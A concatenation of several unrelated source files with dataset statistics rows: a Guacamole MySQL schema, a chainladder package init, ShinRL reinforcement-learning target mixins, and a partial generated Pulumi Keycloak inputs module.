UNIQUE KEY `connection_group_name_parent` (`connection_group_name`, `parent_id`),
CONSTRAINT `guacamole_connection_group_ibfk_1`
FOREIGN KEY (`parent_id`)
REFERENCES `guacamole_connection_group` (`connection_group_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_connection` (
`connection_id` int(11) NOT NULL AUTO_INCREMENT,
`connection_name` varchar(128) NOT NULL,
`parent_id` int(11),
`protocol` varchar(32) NOT NULL,
`proxy_port` integer,
`proxy_hostname` varchar(512),
`proxy_encryption_method` enum('NONE', 'SSL'),
`max_connections` int(11),
`max_connections_per_user` int(11),
`connection_weight` int(11),
`failover_only` boolean NOT NULL DEFAULT 0,
PRIMARY KEY (`connection_id`),
UNIQUE KEY `connection_name_parent` (`connection_name`, `parent_id`),
CONSTRAINT `guacamole_connection_ibfk_1`
FOREIGN KEY (`parent_id`)
REFERENCES `guacamole_connection_group` (`connection_group_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_entity` (
`entity_id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(128) NOT NULL,
`type` enum('USER',
'USER_GROUP') NOT NULL,
PRIMARY KEY (`entity_id`),
UNIQUE KEY `guacamole_entity_name_scope` (`type`, `name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_user` (
`user_id` int(11) NOT NULL AUTO_INCREMENT,
`entity_id` int(11) NOT NULL,
`password_hash` binary(32) NOT NULL,
`password_salt` binary(32),
`password_date` datetime NOT NULL,
`disabled` boolean NOT NULL DEFAULT 0,
`expired` boolean NOT NULL DEFAULT 0,
`access_window_start` TIME,
`access_window_end` TIME,
`valid_from` DATE,
`valid_until` DATE,
`timezone` VARCHAR(64),
`full_name` VARCHAR(256),
`email_address` VARCHAR(256),
`organization` VARCHAR(256),
`organizational_role` VARCHAR(256),
PRIMARY KEY (`user_id`),
UNIQUE KEY `guacamole_user_single_entity` (`entity_id`),
CONSTRAINT `guacamole_user_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`)
ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_user_group` (
`user_group_id` int(11) NOT NULL AUTO_INCREMENT,
`entity_id` int(11) NOT NULL,
`disabled` boolean NOT NULL DEFAULT 0,
PRIMARY KEY (`user_group_id`),
UNIQUE KEY `guacamole_user_group_single_entity` (`entity_id`),
CONSTRAINT `guacamole_user_group_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`)
ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_user_group_member` (
`user_group_id` int(11) NOT NULL,
`member_entity_id` int(11) NOT NULL,
PRIMARY KEY (`user_group_id`, `member_entity_id`),
CONSTRAINT `guacamole_user_group_member_parent_id`
FOREIGN KEY (`user_group_id`)
REFERENCES `guacamole_user_group` (`user_group_id`) ON DELETE CASCADE,
CONSTRAINT `guacamole_user_group_member_entity_id`
FOREIGN KEY (`member_entity_id`)
REFERENCES `guacamole_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_sharing_profile (
`sharing_profile_id` int(11) NOT NULL AUTO_INCREMENT,
`sharing_profile_name` varchar(128) NOT NULL,
`primary_connection_id` int(11) NOT NULL,
PRIMARY KEY (`sharing_profile_id`),
UNIQUE KEY `sharing_profile_name_primary` (sharing_profile_name, primary_connection_id),
CONSTRAINT `guacamole_sharing_profile_ibfk_1`
FOREIGN KEY (`primary_connection_id`)
REFERENCES `guacamole_connection` (`connection_id`)
ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_connection_parameter` (
`connection_id` int(11) NOT NULL,
`parameter_name` varchar(128) NOT NULL,
`parameter_value` varchar(4096) NOT NULL,
PRIMARY KEY (`connection_id`,`parameter_name`),
CONSTRAINT `guacamole_connection_parameter_ibfk_1`
FOREIGN KEY (`connection_id`)
REFERENCES `guacamole_connection` (`connection_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_sharing_profile_parameter (
`sharing_profile_id` integer NOT NULL,
`parameter_name` varchar(128) NOT NULL,
`parameter_value` varchar(4096) NOT NULL,
PRIMARY KEY (`sharing_profile_id`, `parameter_name`),
CONSTRAINT `guacamole_sharing_profile_parameter_ibfk_1`
FOREIGN KEY (`sharing_profile_id`)
REFERENCES `guacamole_sharing_profile` (`sharing_profile_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_user_attribute (
`user_id` int(11) NOT NULL,
`attribute_name` varchar(128) NOT NULL,
`attribute_value` varchar(4096) NOT NULL,
PRIMARY KEY (user_id, attribute_name),
KEY `user_id` (`user_id`),
CONSTRAINT guacamole_user_attribute_ibfk_1
FOREIGN KEY (user_id)
REFERENCES guacamole_user (user_id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_user_group_attribute (
`user_group_id` int(11) NOT NULL,
`attribute_name` varchar(128) NOT NULL,
`attribute_value` varchar(4096) NOT NULL,
PRIMARY KEY (`user_group_id`, `attribute_name`),
KEY `user_group_id` (`user_group_id`),
CONSTRAINT `guacamole_user_group_attribute_ibfk_1`
FOREIGN KEY (`user_group_id`)
REFERENCES `guacamole_user_group` (`user_group_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_connection_attribute (
`connection_id` int(11) NOT NULL,
`attribute_name` varchar(128) NOT NULL,
`attribute_value` varchar(4096) NOT NULL,
PRIMARY KEY (connection_id, attribute_name),
KEY `connection_id` (`connection_id`),
CONSTRAINT guacamole_connection_attribute_ibfk_1
FOREIGN KEY (connection_id)
REFERENCES guacamole_connection (connection_id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_connection_group_attribute (
`connection_group_id` int(11) NOT NULL,
`attribute_name` varchar(128) NOT NULL,
`attribute_value` varchar(4096) NOT NULL,
PRIMARY KEY (connection_group_id, attribute_name),
KEY `connection_group_id` (`connection_group_id`),
CONSTRAINT guacamole_connection_group_attribute_ibfk_1
FOREIGN KEY (connection_group_id)
REFERENCES guacamole_connection_group (connection_group_id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_sharing_profile_attribute (
`sharing_profile_id` int(11) NOT NULL,
`attribute_name` varchar(128) NOT NULL,
`attribute_value` varchar(4096) NOT NULL,
PRIMARY KEY (sharing_profile_id, attribute_name),
KEY `sharing_profile_id` (`sharing_profile_id`),
CONSTRAINT guacamole_sharing_profile_attribute_ibfk_1
FOREIGN KEY (sharing_profile_id)
REFERENCES guacamole_sharing_profile (sharing_profile_id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_connection_permission` (
`entity_id` int(11) NOT NULL,
`connection_id` int(11) NOT NULL,
`permission` enum('READ',
'UPDATE',
'DELETE',
'ADMINISTER') NOT NULL,
PRIMARY KEY (`entity_id`,`connection_id`,`permission`),
CONSTRAINT `guacamole_connection_permission_ibfk_1`
FOREIGN KEY (`connection_id`)
REFERENCES `guacamole_connection` (`connection_id`) ON DELETE CASCADE,
CONSTRAINT `guacamole_connection_permission_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_connection_group_permission` (
`entity_id` int(11) NOT NULL,
`connection_group_id` int(11) NOT NULL,
`permission` enum('READ',
'UPDATE',
'DELETE',
'ADMINISTER') NOT NULL,
PRIMARY KEY (`entity_id`,`connection_group_id`,`permission`),
CONSTRAINT `guacamole_connection_group_permission_ibfk_1`
FOREIGN KEY (`connection_group_id`)
REFERENCES `guacamole_connection_group` (`connection_group_id`) ON DELETE CASCADE,
CONSTRAINT `guacamole_connection_group_permission_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_sharing_profile_permission (
`entity_id` integer NOT NULL,
`sharing_profile_id` integer NOT NULL,
`permission` enum('READ',
'UPDATE',
'DELETE',
'ADMINISTER') NOT NULL,
PRIMARY KEY (`entity_id`, `sharing_profile_id`, `permission`),
CONSTRAINT `guacamole_sharing_profile_permission_ibfk_1`
FOREIGN KEY (`sharing_profile_id`)
REFERENCES `guacamole_sharing_profile` (`sharing_profile_id`) ON DELETE CASCADE,
CONSTRAINT `guacamole_sharing_profile_permission_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_system_permission` (
`entity_id` int(11) NOT NULL,
`permission` enum('CREATE_CONNECTION',
'CREATE_CONNECTION_GROUP',
'CREATE_SHARING_PROFILE',
'CREATE_USER',
'CREATE_USER_GROUP',
'ADMINISTER') NOT NULL,
PRIMARY KEY (`entity_id`,`permission`),
CONSTRAINT `guacamole_system_permission_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_user_permission` (
`entity_id` int(11) NOT NULL,
`affected_user_id` int(11) NOT NULL,
`permission` enum('READ',
'UPDATE',
'DELETE',
'ADMINISTER') NOT NULL,
PRIMARY KEY (`entity_id`,`affected_user_id`,`permission`),
CONSTRAINT `guacamole_user_permission_ibfk_1`
FOREIGN KEY (`affected_user_id`)
REFERENCES `guacamole_user` (`user_id`) ON DELETE CASCADE,
CONSTRAINT `guacamole_user_permission_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_user_group_permission` (
`entity_id` int(11) NOT NULL,
`affected_user_group_id` int(11) NOT NULL,
`permission` enum('READ',
'UPDATE',
'DELETE',
'ADMINISTER') NOT NULL,
PRIMARY KEY (`entity_id`, `affected_user_group_id`, `permission`),
CONSTRAINT `guacamole_user_group_permission_affected_user_group`
FOREIGN KEY (`affected_user_group_id`)
REFERENCES `guacamole_user_group` (`user_group_id`) ON DELETE CASCADE,
CONSTRAINT `guacamole_user_group_permission_entity`
FOREIGN KEY (`entity_id`)
REFERENCES `guacamole_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `guacamole_connection_history` (
`history_id` int(11) NOT NULL AUTO_INCREMENT,
`user_id` int(11) DEFAULT NULL,
`username` varchar(128) NOT NULL,
`remote_host` varchar(256) DEFAULT NULL,
`connection_id` int(11) DEFAULT NULL,
`connection_name` varchar(128) NOT NULL,
`sharing_profile_id` int(11) DEFAULT NULL,
`sharing_profile_name` varchar(128) DEFAULT NULL,
`start_date` datetime NOT NULL,
`end_date` datetime DEFAULT NULL,
PRIMARY KEY (`history_id`),
KEY `user_id` (`user_id`),
KEY `connection_id` (`connection_id`),
KEY `sharing_profile_id` (`sharing_profile_id`),
KEY `start_date` (`start_date`),
KEY `end_date` (`end_date`),
KEY `connection_start_date` (`connection_id`, `start_date`),
CONSTRAINT `guacamole_connection_history_ibfk_1`
FOREIGN KEY (`user_id`)
REFERENCES `guacamole_user` (`user_id`) ON DELETE SET NULL,
CONSTRAINT `guacamole_connection_history_ibfk_2`
FOREIGN KEY (`connection_id`)
REFERENCES `guacamole_connection` (`connection_id`) ON DELETE SET NULL,
CONSTRAINT `guacamole_connection_history_ibfk_3`
FOREIGN KEY (`sharing_profile_id`)
REFERENCES `guacamole_sharing_profile` (`sharing_profile_id`) ON DELETE SET NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_user_history (
`history_id` int(11) NOT NULL AUTO_INCREMENT,
`user_id` int(11) DEFAULT NULL,
`username` varchar(128) NOT NULL,
`remote_host` varchar(256) DEFAULT NULL,
`start_date` datetime NOT NULL,
`end_date` datetime DEFAULT NULL,
PRIMARY KEY (history_id),
KEY `user_id` (`user_id`),
KEY `start_date` (`start_date`),
KEY `end_date` (`end_date`),
KEY `user_start_date` (`user_id`, `start_date`),
CONSTRAINT guacamole_user_history_ibfk_1
FOREIGN KEY (user_id)
REFERENCES guacamole_user (user_id) ON DELETE SET NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE guacamole_user_password_history (
`password_history_id` int(11) NOT NULL AUTO_INCREMENT,
`user_id` int(11) NOT NULL,
`password_hash` binary(32) NOT NULL,
`password_salt` binary(32),
`password_date` datetime NOT NULL,
PRIMARY KEY (`password_history_id`),
KEY `user_id` (`user_id`),
CONSTRAINT `guacamole_user_password_history_ibfk_1`
FOREIGN KEY (`user_id`)
REFERENCES `guacamole_user` (`user_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;"""))
else:
raise Exception("No Guacamole schema support for: %s",
settings.DATABASES['default']['ENGINE'])
| 38.254167
| 256
| 0.643939
| 3,860
| 36,724
| 5.864249
| 0.050518
| 0.045768
| 0.040643
| 0.030041
| 0.892737
| 0.848781
| 0.777611
| 0.714216
| 0.668228
| 0.624801
| 0
| 0.017385
| 0.252859
| 36,724
| 959
| 257
| 38.294056
| 0.807603
| 0.001225
| 0
| 0.580928
| 1
| 0
| 0.67072
| 0.172533
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.033877
| 0.005019
| 0
| 0.010038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30a70eba5e6bffa862d4b47834ab6a731ae2d61c
| 189
|
py
|
Python
|
chainladder/core/__init__.py
|
Aborah30/chainladder-python
|
c7d3f4f0a5333b6bd34922cc406f252ab9c47e10
|
[
"MIT"
] | null | null | null |
chainladder/core/__init__.py
|
Aborah30/chainladder-python
|
c7d3f4f0a5333b6bd34922cc406f252ab9c47e10
|
[
"MIT"
] | null | null | null |
chainladder/core/__init__.py
|
Aborah30/chainladder-python
|
c7d3f4f0a5333b6bd34922cc406f252ab9c47e10
|
[
"MIT"
] | null | null | null |
""" core should store the core data structure functionality.
"""
from chainladder.core.triangle import Triangle # noqa (API import)
from chainladder.core.base import IO # noqa (API import)
| 37.8
| 66
| 0.772487
| 26
| 189
| 5.615385
| 0.576923
| 0.205479
| 0.260274
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137566
| 189
| 4
| 67
| 47.25
| 0.895706
| 0.492063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
30f99e10b9a95e3db488a09898a333f0bc7c3d06
| 4,429
|
py
|
Python
|
shinrl/solvers/pi/discrete/core/target_mixin.py
|
qqhann/ShinRL
|
5f95f01d8061d1dc3ffdc84f4049ab88daa00758
|
[
"MIT"
] | null | null | null |
shinrl/solvers/pi/discrete/core/target_mixin.py
|
qqhann/ShinRL
|
5f95f01d8061d1dc3ffdc84f4049ab88daa00758
|
[
"MIT"
] | null | null | null |
shinrl/solvers/pi/discrete/core/target_mixin.py
|
qqhann/ShinRL
|
5f95f01d8061d1dc3ffdc84f4049ab88daa00758
|
[
"MIT"
] | null | null | null |
"""MixIns to compute the target value of PI-based algorithms.
Author: Toshinori Kitamura
Affiliation: NAIST & OSX
"""
from abc import ABC, abstractmethod
import distrax
from chex import Array
from distrax import Categorical
import shinrl as srl
class TargetMixIn(ABC):
@abstractmethod
def target_pol_dist(self, q: Array) -> Categorical:
pass
@abstractmethod
def target_q_tabular_dp(self, tb_dict: srl.TbDict, pol_dist: Categorical) -> Array:
pass
@abstractmethod
def target_q_tabular_rl(
self, tb_dict: srl.TbDict, next_pol_dist: Categorical, samples: srl.Sample
) -> Array:
pass
@abstractmethod
def target_q_deep_dp(
self, prms_dict: srl.ParamsDict, next_pol_dist: Categorical
) -> Array:
pass
@abstractmethod
def target_q_deep_rl(
self, prms_dict: srl.ParamsDict, pol_dist: Categorical, samples: srl.Sample
) -> Array:
pass
class QTargetMixIn(TargetMixIn):
def target_pol_dist(self, q: Array) -> Categorical:
return distrax.Greedy(q)
def target_q_tabular_dp(self, tb_dict: srl.TbDict, pol_dist: Categorical) -> Array:
return srl.expected_backup_dp(
tb_dict["Q"],
pol_dist.probs,
self.env.mdp.rew_mat,
self.env.mdp.tran_mat,
self.config.discount,
)
def target_q_tabular_rl(
self, tb_dict: srl.TbDict, next_pol_dist: Categorical, samples: srl.Sample
) -> Array:
return srl.expected_backup_rl(
tb_dict["Q"][samples.next_state.squeeze(axis=1)], # BxA
next_pol_dist.probs[samples.next_state.squeeze(axis=1)], # BxA
samples.rew,
samples.done,
self.config.discount,
)
def target_q_deep_dp(
self, prms_dict: srl.ParamsDict, pol_dist: Categorical
) -> Array:
return srl.expected_backup_dp(
self.q_net.apply(prms_dict["TargQNet"], self.env.mdp.obs_mat),
pol_dist.probs,
self.env.mdp.rew_mat,
self.env.mdp.tran_mat,
self.config.discount,
)
def target_q_deep_rl(
self, prms_dict: srl.ParamsDict, next_pol_dist: Categorical, samples: srl.Sample
) -> Array:
return srl.expected_backup_rl(
self.q_net.apply(prms_dict["TargQNet"], samples.next_obs),
next_pol_dist.probs,
samples.rew,
samples.done,
self.config.discount,
)
# ----- Soft Q algorithm -----
class SoftQTargetMixIn(TargetMixIn):
def target_pol_dist(self, q: Array) -> Categorical:
return distrax.Softmax(q, temperature=self.config.er_coef)
def target_q_tabular_dp(self, tb_dict: srl.TbDict, pol_dist: Categorical) -> Array:
return srl.soft_expected_backup_dp(
tb_dict["Q"],
pol_dist.probs,
pol_dist.logits,
self.env.mdp.rew_mat,
self.env.mdp.tran_mat,
self.config.discount,
self.config.er_coef,
)
def target_q_tabular_rl(
self, tb_dict: srl.TbDict, pol_dist: Categorical, samples: srl.Sample
) -> Array:
return srl.soft_expected_backup_rl(
tb_dict["Q"][samples.next_state.squeeze(axis=1)], # BxA
pol_dist.probs[samples.next_state.squeeze(axis=1)], # BxA
pol_dist.logits[samples.next_state.squeeze(axis=1)], # BxA
samples.rew,
samples.done,
self.config.discount,
self.config.er_coef,
)
def target_q_deep_dp(
self, prms_dict: srl.ParamsDict, pol_dist: Categorical
) -> Array:
return srl.soft_expected_backup_dp(
self.q_net.apply(prms_dict["TargQNet"], self.env.mdp.obs_mat),
pol_dist.probs,
pol_dist.logits,
self.env.mdp.rew_mat,
self.env.mdp.tran_mat,
self.config.discount,
self.config.er_coef,
)
def target_q_deep_rl(
self, prms_dict: srl.ParamsDict, pol_dist: Categorical, samples: srl.Sample
) -> Array:
return srl.soft_expected_backup_rl(
self.q_net.apply(prms_dict["TargQNet"], samples.next_obs),
pol_dist.probs,
pol_dist.logits,
samples.rew,
samples.done,
self.config.discount,
self.config.er_coef,
)
| 30.544828
| 88
| 0.612779
| 553
| 4,429
| 4.658228
| 0.141049
| 0.07337
| 0.046584
| 0.039596
| 0.878106
| 0.870342
| 0.853649
| 0.833075
| 0.809394
| 0.770575
| 0
| 0.001582
| 0.286521
| 4,429
| 144
| 89
| 30.756944
| 0.813608
| 0.036351
| 0
| 0.786325
| 0
| 0
| 0.008459
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128205
| false
| 0.042735
| 0.042735
| 0.08547
| 0.282051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5161b2a735481e78db49a0bebf26950bba539e5
| 18,339
|
py
|
Python
|
sdk/python/pulumi_keycloak/openid/_inputs.py
|
davide-talesco/pulumi-keycloak
|
08d66be6f2bf578d4292e29eb6181794375bc4e5
|
[
"ECL-2.0",
"Apache-2.0"
] | 13
|
2020-04-28T15:20:56.000Z
|
2022-03-24T18:00:17.000Z
|
sdk/python/pulumi_keycloak/openid/_inputs.py
|
davide-talesco/pulumi-keycloak
|
08d66be6f2bf578d4292e29eb6181794375bc4e5
|
[
"ECL-2.0",
"Apache-2.0"
] | 49
|
2020-02-06T17:53:35.000Z
|
2022-03-25T19:36:08.000Z
|
sdk/python/pulumi_keycloak/openid/_inputs.py
|
davide-talesco/pulumi-keycloak
|
08d66be6f2bf578d4292e29eb6181794375bc4e5
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-06-09T01:08:56.000Z
|
2021-12-07T15:30:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ClientAuthenticationFlowBindingOverridesArgs',
'ClientAuthorizationArgs',
'ClientGroupPolicyGroupArgs',
'ClientPermissionsConfigureScopeArgs',
'ClientPermissionsManageScopeArgs',
'ClientPermissionsMapRolesClientScopeScopeArgs',
'ClientPermissionsMapRolesCompositeScopeArgs',
'ClientPermissionsMapRolesScopeArgs',
'ClientPermissionsTokenExchangeScopeArgs',
'ClientPermissionsViewScopeArgs',
'ClientRolePolicyRoleArgs',
]
@pulumi.input_type
class ClientAuthenticationFlowBindingOverridesArgs:
def __init__(__self__, *,
browser_id: Optional[pulumi.Input[str]] = None,
direct_grant_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] browser_id: Browser flow id, (flow needs to exist)
:param pulumi.Input[str] direct_grant_id: Direct grant flow id (flow needs to exist)
"""
if browser_id is not None:
pulumi.set(__self__, "browser_id", browser_id)
if direct_grant_id is not None:
pulumi.set(__self__, "direct_grant_id", direct_grant_id)
@property
@pulumi.getter(name="browserId")
def browser_id(self) -> Optional[pulumi.Input[str]]:
"""
Browser flow id, (flow needs to exist)
"""
return pulumi.get(self, "browser_id")
@browser_id.setter
def browser_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "browser_id", value)
@property
@pulumi.getter(name="directGrantId")
def direct_grant_id(self) -> Optional[pulumi.Input[str]]:
"""
Direct grant flow id (flow needs to exist)
"""
return pulumi.get(self, "direct_grant_id")
@direct_grant_id.setter
def direct_grant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "direct_grant_id", value)
@pulumi.input_type
class ClientAuthorizationArgs:
def __init__(__self__, *,
policy_enforcement_mode: pulumi.Input[str],
allow_remote_resource_management: Optional[pulumi.Input[bool]] = None,
decision_strategy: Optional[pulumi.Input[str]] = None,
keep_defaults: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] policy_enforcement_mode: Dictates how policies are enforced when evaluating authorization requests. Can be one of `ENFORCING`, `PERMISSIVE`, or `DISABLED`.
:param pulumi.Input[bool] allow_remote_resource_management: When `true`, resources can be managed remotely by the resource server. Defaults to `false`.
:param pulumi.Input[str] decision_strategy: Dictates how the policies associated with a given permission are evaluated and how a final decision is obtained. Could be one of `AFFIRMATIVE`, `CONSENSUS`, or `UNANIMOUS`. Applies to permissions.
:param pulumi.Input[bool] keep_defaults: When `true`, defaults set by Keycloak will be respected. Defaults to `false`.
"""
pulumi.set(__self__, "policy_enforcement_mode", policy_enforcement_mode)
if allow_remote_resource_management is not None:
pulumi.set(__self__, "allow_remote_resource_management", allow_remote_resource_management)
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if keep_defaults is not None:
pulumi.set(__self__, "keep_defaults", keep_defaults)
@property
@pulumi.getter(name="policyEnforcementMode")
def policy_enforcement_mode(self) -> pulumi.Input[str]:
"""
Dictates how policies are enforced when evaluating authorization requests. Can be one of `ENFORCING`, `PERMISSIVE`, or `DISABLED`.
"""
return pulumi.get(self, "policy_enforcement_mode")
@policy_enforcement_mode.setter
def policy_enforcement_mode(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_enforcement_mode", value)
@property
@pulumi.getter(name="allowRemoteResourceManagement")
def allow_remote_resource_management(self) -> Optional[pulumi.Input[bool]]:
"""
When `true`, resources can be managed remotely by the resource server. Defaults to `false`.
"""
return pulumi.get(self, "allow_remote_resource_management")
@allow_remote_resource_management.setter
def allow_remote_resource_management(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_remote_resource_management", value)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
"""
Dictates how the policies associated with a given permission are evaluated and how a final decision is obtained. Could be one of `AFFIRMATIVE`, `CONSENSUS`, or `UNANIMOUS`. Applies to permissions.
"""
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter(name="keepDefaults")
def keep_defaults(self) -> Optional[pulumi.Input[bool]]:
"""
When `true`, defaults set by Keycloak will be respected. Defaults to `false`.
"""
return pulumi.get(self, "keep_defaults")
@keep_defaults.setter
def keep_defaults(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "keep_defaults", value)
@pulumi.input_type
class ClientGroupPolicyGroupArgs:
def __init__(__self__, *,
extend_children: pulumi.Input[bool],
id: pulumi.Input[str],
path: pulumi.Input[str]):
pulumi.set(__self__, "extend_children", extend_children)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "path", path)
@property
@pulumi.getter(name="extendChildren")
def extend_children(self) -> pulumi.Input[bool]:
return pulumi.get(self, "extend_children")
@extend_children.setter
def extend_children(self, value: pulumi.Input[bool]):
pulumi.set(self, "extend_children", value)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def path(self) -> pulumi.Input[str]:
return pulumi.get(self, "path")
@path.setter
def path(self, value: pulumi.Input[str]):
pulumi.set(self, "path", value)
@pulumi.input_type
class ClientPermissionsConfigureScopeArgs:
def __init__(__self__, *,
decision_strategy: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if description is not None:
pulumi.set(__self__, "description", description)
if policies is not None:
pulumi.set(__self__, "policies", policies)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "policies", value)
@pulumi.input_type
class ClientPermissionsManageScopeArgs:
def __init__(__self__, *,
decision_strategy: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if description is not None:
pulumi.set(__self__, "description", description)
if policies is not None:
pulumi.set(__self__, "policies", policies)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "policies", value)
@pulumi.input_type
class ClientPermissionsMapRolesClientScopeScopeArgs:
def __init__(__self__, *,
decision_strategy: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if description is not None:
